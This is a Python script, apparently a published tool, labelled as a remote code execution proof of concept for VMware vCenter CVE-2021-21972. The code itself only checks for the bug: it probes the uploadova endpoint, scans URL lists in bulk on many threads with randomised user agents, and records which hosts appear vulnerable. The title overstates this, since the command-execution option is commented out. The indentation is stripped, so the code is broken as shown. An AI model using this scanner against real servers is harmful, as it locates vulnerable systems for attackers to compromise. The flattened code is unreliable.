VMware vCenter 6.5 / 7.0 Remote Code Execution Proof Of Concept

`#-*- coding:utf-8 -*-  
banner = """  
888888ba dP   
88 `8b 88   
a88aaaa8P' .d8888b. d8888P .d8888b. dP dP   
88 `8b. 88' `88 88 Y8ooooo. 88 88   
88 .88 88. .88 88 88 88. .88   
88888888P `88888P8 dP `88888P' `88888P'   
ooooooooooooooooooooooooooooooooooooooooooooooooooooo   
@time:2021/02/24 CVE-2021-21972.py  
C0de by NebulabdSec - @batsu   
"""  
print(banner)  
  
import threadpool  
import random  
import requests  
import argparse  
import http.client  
import urllib3  
  
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)  
http.client.HTTPConnection._http_vsn = 10  
http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'  
  
TARGET_URI = "/ui/vropspluginui/rest/services/uploadova"  
  
def get_ua():  
first_num = random.randint(55, 62)  
third_num = random.randint(0, 3200)  
fourth_num = random.randint(0, 140)  
os_type = [  
'(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', '(X11; Linux x86_64)',  
'(Macintosh; Intel Mac OS X 10_12_6)'  
]  
chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)  
  
ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',  
'(KHTML, like Gecko)', chrome_version, 'Safari/537.36']  
)  
return ua  
  
def CVE_2021_21972(url):  
proxies = {"scoks5": "http://127.0.0.1:1081"}  
headers = {  
'User-Agent': get_ua(),  
"Content-Type": "application/x-www-form-urlencoded"  
}  
targetUrl = url + TARGET_URI  
try:  
res = requests.get(targetUrl,  
headers=headers,  
timeout=15,  
verify=False,  
proxies=proxies)  
# proxies={'socks5': 'http://127.0.0.1:1081'})  
# print(len(res.text))  
if res.status_code == 405:  
print("[+] URL:{}--------存在CVE-2021-21972漏洞".format(url))  
# print("[+] Command success result: " + res.text + "\n")  
with open("存在漏洞地址.txt", 'a') as fw:  
fw.write(url + '\n')  
else:  
print("[-] " + url + " 没有发现CVE-2021-21972漏洞.\n")  
# except Exception as e:  
# print(e)  
except:  
print("[-] " + url + " Request ERROR.\n")  
def multithreading(filename, pools=5):  
works = []  
with open(filename, "r") as f:  
for i in f:  
func_params = [i.rstrip("\n")]  
# func_params = [i] + [cmd]  
works.append((func_params, None))  
pool = threadpool.ThreadPool(pools)  
reqs = threadpool.makeRequests(CVE_2021_21972, works)  
[pool.putRequest(req) for req in reqs]  
pool.wait()  
  
def main():  
parser = argparse.ArgumentParser()  
parser.add_argument("-u",  
"--url",  
help="Target URL; Example:http://ip:port")  
parser.add_argument("-f",  
"--file",  
help="Url File; Example:url.txt")  
# parser.add_argument("-c", "--cmd", help="Commands to be executed; ")  
args = parser.parse_args()  
url = args.url  
# cmd = args.cmd  
file_path = args.file  
if url != None and file_path ==None:  
CVE_2021_21972(url)  
elif url == None and file_path != None:  
multithreading(file_path, 10) # 默认15线程  
  
if __name__ == "__main__":  
main()  
  
`